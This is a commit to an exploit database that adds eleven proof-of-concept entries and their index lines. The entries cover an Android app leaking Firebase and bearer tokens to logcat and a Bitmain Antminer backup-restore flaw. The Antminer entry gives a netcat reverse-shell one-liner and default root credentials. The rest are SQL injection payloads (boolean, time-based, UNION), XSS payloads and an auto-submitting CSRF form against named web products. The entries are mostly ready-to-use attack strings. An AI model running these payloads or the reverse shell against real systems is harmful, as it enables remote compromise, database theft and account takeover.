DB: 2018-05-28

11 changes to exploits/shellcodes Werewolf Online 0.8.8 - Information Disclosure Bitmain Antminer D3/L3+/S9 - Remote Command Execution Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting Ingenious School Management System - 'id' SQL Injection Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting Lyrist - 'id' SQL Injection BookingWizz Booking System 5.5 - 'id' SQL Injection Listing Hub CMS 1.0 - SQL Injection ClipperCMS 1.3.3 - Cross-Site Scripting My Directory 2.0 - SQL Injection / Cross-Site Scripting Baby Names Search Engine 1.0 - 'a' SQL Injection
2018-05-28 05:01:49 +00:00 · 2018-05-28 05:01:49 +00:00 · 3df6650dac
commit 3df6650dac
parent 6ba5b68c67
12 changed files with 363 additions and 0 deletions
--- a/exploits/android/local/44776.txt
+++ b/exploits/android/local/44776.txt
@ -0,0 +1,56 @@
+# Exploit Title: Werewolf Online 0.8.8  - Insecure Logging
+# Date: 2018-05-24
+# Software Link:
+https://play.google.com/store/apps/details?id=com.werewolfapps.online
+# Download Link:
+https://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details
+# Exploit Author: ManhNho
+# Version: 0.8.8 Android App
+# CVE: CVE-2018-11505
+# Category: Mobile Apps
+# Tested on: Android 4.4
+
+---Description---
+
+Many developers log information to the android log. Sometimes sensitive
+data as well.
+With output of logcat, Hacker can get "Firebase token" which used in PUT
+request to /players/meAndCheckAppVersion
+
+---PoC---
+
+root@vbox86p:/ # ps | grep 'were'
+u0_a72    9161  205   810364 172268 ffffffff b765ea23 S
+com.werewolfapps.online
+root@vbox86p:/ # logcat | grep -i '9161'
+I/ActivityManager(  586): Start proc com.werewolfapps.online for activity
+com.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,
+3003, 1028, 1015}
+I/MultiDex( 9161): VM with version 1.6.0 does not have multidex support
+I/MultiDex( 9161): Installing application
+...
+D/RNFirebaseMessaging( 9161): Firebase token:
+dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8
+D/RNFirebaseAuth( 9161): getToken/getIdToken
+D/RNFirebaseAuth( 9161): getToken:onComplete:success
+...
+
+Request:
+
+PUT /players/meAndCheckAppVersion HTTP/1.1
+authorization: Bearer
+eyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw
+Content-Type: application/json; charset=utf-8
+Content-Length: 207
+Host: api-core.werewolf-apps.com
+Connection: close
+Accept-Encoding: gzip, deflate
+Cookie:
+AWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3
+User-Agent: okhttp/3.6.0
+
+{"versionNumber":48,"platform":"android","fcmToken":"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8"}
+
+---References---
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505
+https://pastebin.com/NtPn3jB8
--- a/exploits/hardware/remote/44779.txt
+++ b/exploits/hardware/remote/44779.txt
@ -0,0 +1,41 @@
+# Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution
+# Google Dork: N/A
+# Date: 27/05/2018
+# Exploit Author: Corrado Liotta
+# Vendor Homepage: https://www.bitmain.com/
+# Software Link: N/A
+# Version: Antminer - D3, L3+, S9, and other
+# Tested on: Windows/Linux
+# CVE : CVE-2018-11220
+
+#Description
+
+The software used by the miners produced by the bitmain (AntMiner) is
+affected by a vulnerability of remote code execution type, it is possible
+through the "Retore Backup" functionality of the administration portal to
+execute commands on the system. This would allow a malicious user with
+valid credentials to access the entire file system with administrative
+privileges.
+
+#POC
+
+Login on Antminer Configuration Portal (Default Credential: root/root)
+
+1) Create a file named:
+
+restoreConfig.sh
+
+2) insert inside:
+
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port
+>/tmp/f
+
+3) Generate archive by inserting the file created before:
+
+Exploit.tar
+
+4) Launch net cat and upload file:
+
+nc -vv -l -p port
+
+system --> upgrade --> upload archive
--- a/exploits/php/webapps/44769.txt
+++ b/exploits/php/webapps/44769.txt
@ -0,0 +1,53 @@
+# Exploit Title: Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
+# Dork: N/A
+# Date: 26.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: Wachipi
+# Vendor Homepage: https://codecanyon.net/item/wp-booking-calendar/4639530
+# Version: 3.0.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : An attacker can perform attacks via calendar ajax queries.
+However, this plugin is fully PHP-enabled. You can run SQL query with "month" and "year" parameters.
+These parameters are also suitable for XSS attacks.
+All PHP queries for which these parameters work have the same vulnerable.
+
+====================================================
+# "fillEventsPopup.php, searchEvents.php, getEvent.php, getMonthCalendar.php" have the same vulnerable.
+
+# PoC : SQLi :
+# GET /BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php?month=4&year=2018&calendar_id=1&publickey=6LcDyOASAAAAACsEVY6G4Yo1BqxCGW15S15mb36-%20&wpml_lang=
+
+# Parameter: month (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&calendar_id=1
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&calendar_id=1
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 29 columns
+    Payload: year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1
+
+Parameter: year (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: year=-8454' OR 7997=7997#&month=5&calendar_id=14&pag=1
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: year=2018' AND SLEEP(5)-- uTJs&month=5&calendar_id=14&pag=1
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 29 columns
+    Payload: year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&calendar_id=1
+
+====================================================
+
+# PoC : XSS :
+
+Payload(year) : http://www.site.com/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php?month=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&year=2018&calendar_id=1&publickey=6LcDyOASAAAAACsEVY6G4Yo1BqxCGW15S15mb36-%20&wpml_lang=
+
+Payload(month) : http://www.site.com/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php?month=4&year=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&calendar_id=1&publickey=6LcDyOASAAAAACsEVY6G4Yo1BqxCGW15S15mb36-%20&wpml_lang=
--- a/exploits/php/webapps/44770.txt
+++ b/exploits/php/webapps/44770.txt
@ -0,0 +1,9 @@
+# Exploit Title: Ingenious School Management System - SQL Injection
+# Date: 2018-05-26
+# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
+# Vendor Homepage: https://www.codester.com/items/4945/ingenious-school-management-system
+# Version: All Version
+
+
+Exploit :
+http://site.com/model/get_teacher.php?id=-10+[SQL+Command]
--- a/exploits/php/webapps/44771.html
+++ b/exploits/php/webapps/44771.html
@ -0,0 +1,17 @@
+ # Exploit Title: Sharetronix CMS XSRF Vulnerability
+# Version : 3.6.2
+# Exploit Author: Hesam Bazvand
+# Software Link: http://sharetronix.ir/wp-content/uploads/2014/10/gold.zip
+# Tested on: Windows 10 / Kali Linux
+# Category: WebApps
+# Dork : Use You Mind :D
+# Email : Black.king066@gmail.com
+# Video : https://youtu.be/S1r0tmXEUec
+
+
+<body onload="document.fm.submit()">
+<form method="post" name="fm"  action="http://localhost/share/admin/termsofuse">
+<input type="hidden" name="tos_enabled" value="1" />
+<input type="hidden" name="tos_content"value="<script>alert(1);</script>" />
+</form>
+</body>
--- a/exploits/php/webapps/44772.txt
+++ b/exploits/php/webapps/44772.txt
@ -0,0 +1,10 @@
+# Exploit Title: Lyrist - Music Lyrics Script - SQL Injection
+# Date: 2018-05-26
+# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
+# Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script
+# Version: All Version
+
+
+Exploit :
+http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23
+http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23
--- a/exploits/php/webapps/44773.txt
+++ b/exploits/php/webapps/44773.txt
@ -0,0 +1,24 @@
+# Exploit Title: BookingWizz Booking System 5.5 - 'bs-services-add.php' SQL Injection
+# Dork: N/A
+# Date: 27.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/booking-system/87919
+# Version: 5.5
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The service editing on the admin panel is vulnerable.
+An attacker can exploit the entire database using this vulnerable in the
+'id' parameter.
+====================================================
+
+# PoC : SQLi :
+
+http://www.site.com/booking/bs-services-add.php?id=2
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
+    Payload: id=(SELECT (CASE WHEN (6769=6769) THEN 6769 ELSE 6769*(SELECT
+6769 FROM INFORMATION_SCHEMA.PLUGINS) END))
+
+====================================================
--- a/exploits/php/webapps/44774.txt
+++ b/exploits/php/webapps/44774.txt
@ -0,0 +1,52 @@
+# Exploit Title: Listing Hub CMS 1.0 - Multiple SQL Injection
+# Dork: N/A
+# Date: 27.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : An attacker can use the 'SQLi' attack method on many places.
+====================================================
+
+# PoC : SQLi :
+
+# /items.php Parameter: id (GET)
+
+    Type: boolean-based blind
+    Demo:
+https://site.com/items.php?title=test-listing-1&id=14
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: title=test-listing-1&id=14' AND 4740=4740 AND 'xGsz'='xGsz
+
+    Type: AND/OR time-based blind
+    Demo:
+https://site.com/items.php?title=test-listing-1&id=14
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: title=test-listing-1&id=14' AND SLEEP(5) AND 'FDLK'='FDLK
+
+# /listing_category.php Parameter: city (GET)
+
+    Type: AND/OR time-based blind
+    Demo:
+https://site.com/listing_category.php?keywords=test&city=1&category=1
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: keywords=test&city=1' AND SLEEP(5)-- LTpZ&category=1
+
+    Parameter: category (GET)
+
+    Type: AND/OR time-based blind
+    Demo:
+https://site.com/listing_category.php?keywords=test&city=1&category=1
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: keywords=test&city=1&category=1' AND SLEEP(5)-- LTpZ
+
+# /blog_detail.php Parameter: id (GET)
+
+    Type: AND/OR time-based blind
+    Demo:
+https://site.com/blog_detail.php?title=helping-kids-grow-up-stronger&id=1
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: title=helping-kids-grow-up-stronger&id=1' AND SLEEP(5)-- LTpZ
+
+====================================================
--- a/exploits/php/webapps/44775.txt
+++ b/exploits/php/webapps/44775.txt
@ -0,0 +1,33 @@
+# Exploit Title: ClipperCMS 1.3.3 Persistent XSS on 'Site name' field
+# Date: 05/27/2018
+# Exploit Author: Nathu Nandwani
+# Website: http://nandtech.co/
+# Vendor Homepage: http://www.clippercms.com/
+# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3
+# Version: 1.3.3
+# Tested on: Windows 10 x64 (XAMPP, Chrome)
+# CVE: CVE-2018-11332
+
+*Description
+
+A persistent/stored cross-site scripting (XSS) vulnerability in the "Site Name" field found in the "site" tab under configurations in ClipperCMS 1.3.3 has been discovered because it didn't sanitize user input. It allows authenticated remote attackers to inject arbitrary web script or HTML via a crafted site name to the manager/processors/save_settings.processor.php file.
+
+*Proof of Concept
+
+1. Attacker logs in as an administrator of the site.
+2. Attacker visits the tools->configurations tab and enters the script below in the "Site name" field:
+<script>alert('XSS')</script>
+3. Once the "Save" button is clicked, the payload will execute.
+4. When an unauthenticated user visits the login page "ClipperCMS/manager/", the payload will also execute.
+ 
+*Mitigation
+
+See https://github.com/nathunandwani/ClipperCMS/commit/f286fbfa81dc3728dbbf6d9d817c8848edcad0b2
+
+Timeline
+
+2018-05-21-Vulnerability reported to ClipperCMS development team
+2018-05-21-CVE requested from mitre.org
+2018-05-22-ClipperCMS development team acknowledges but according to them, bug is more on a trust issue rather than coding
+2018-05-22-Added a potential fix in GitHub
+2015-05-24-CVE published by mitre: https://twitter.com/CVEnew/status/999689171227865093
--- a/exploits/php/webapps/44777.txt
+++ b/exploits/php/webapps/44777.txt
@ -0,0 +1,30 @@
+# Exploit Title: My Directory 2.0 - SQL Injection / Cross-Site Scripting
+# Dork: N/A
+# Date: 27.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/my-directory/15859886
+# Version: 2.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands
+from the user search section with 'business' parameter.
+Another parameter 'city', has XSS vulnerability.
+====================================================
+
+# PoC : SQLi :
+
+Parameter: business (GET)
+
+    Type: AND/OR time-based blind
+    Demo:
+http://site.com/SearchResult/result?city=test&business=test&from_type=&latitude=&image=&rating=&longitude=&place_id=
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: city=test&business=test%' AND SLEEP(5) AND
+'%'='&from_type=&latitude=&image=&rating=&longitude=&place_id=
+
+====================================================
+
+# PoC : XSS :
+
+  Payload :
+http://site.com/SearchResult/result?city=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&business=test&from_type=&latitude=&image=&rating=&longitude=&place_id=
--- a/exploits/php/webapps/44778.txt
+++ b/exploits/php/webapps/44778.txt
@ -0,0 +1,27 @@
+# Exploit Title: Baby Names Search Engine v1.0 - 'a' SQL Injection
+# Dork: N/A
+# Date: 27.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: MediaGeni
+# Vendor Homepage:
+https://codecanyon.net/item/baby-names-search-engine/11864316
+# Version: 2.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands
+from search section with 'a' parameter.
+====================================================
+
+# PoC : SQLi :
+
+Parameter: a (GET)
+
+    Type: UNION query
+    Demo:
+http://www.site.com/index.php?q=test&M=true&F=true&a=Turkish&type=3
+    Title: Generic UNION query (NULL) - 4 columns
+    Payload: q=test&M=true&F=true&a=Turkish' UNION ALL SELECT
+NULL,CONCAT(CONCAT('qzjqq','syfofZIoCuhULUBWOuONCiDLDFbwXYyhSdAJvCBU'),'qbzxq'),NULL,NULL--
+ZYcF&type=3
+
+====================================================
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9744,6 +9744,7 @@ id,file,description,date,author,type,platform,port
 44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows,
 44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows,
 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
+44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16526,6 +16527,7 @@ id,file,description,date,author,type,platform,port
 44648,exploits/windows/remote/44648.rb,"HPE iMC 7.3 - Remote Code Execution (Metasploit)",2018-05-18,TrendyTofu,remote,windows,
 44656,exploits/multiple/remote/44656.txt,"mySCADA myPRO 7 - Hard-Coded Credentials",2018-05-20,"Emre ÖVÜNÇ",remote,multiple,
 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
+44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39440,3 +39442,12 @@ id,file,description,date,author,type,platform,port
 44765,exploits/php/webapps/44765.txt,"EasyService Billing 1.0 - 'q' SQL Injection",2018-05-26,"Divya Jain",webapps,php,
 44766,exploits/php/webapps/44766.txt,"mySurvey 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
 44767,exploits/php/webapps/44767.txt,"easyLetters 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
+44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
+44770,exploits/php/webapps/44770.txt,"Ingenious School Management System - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php,
+44771,exploits/php/webapps/44771.html,"Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2018-05-27,"Hesam Bazvand",webapps,php,
+44772,exploits/php/webapps/44772.txt,"Lyrist - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php,
+44773,exploits/php/webapps/44773.txt,"BookingWizz Booking System 5.5 - 'id' SQL Injection",2018-05-27,AkkuS,webapps,php,
+44774,exploits/php/webapps/44774.txt,"Listing Hub CMS 1.0 - SQL Injection",2018-05-27,AkkuS,webapps,php,
+44775,exploits/php/webapps/44775.txt,"ClipperCMS 1.3.3 - Cross-Site Scripting",2018-05-27,"Nathu Nandwani",webapps,php,
+44777,exploits/php/webapps/44777.txt,"My Directory 2.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
+44778,exploits/php/webapps/44778.txt,"Baby Names Search Engine 1.0 - 'a' SQL Injection",2018-05-27,AkkuS,webapps,php,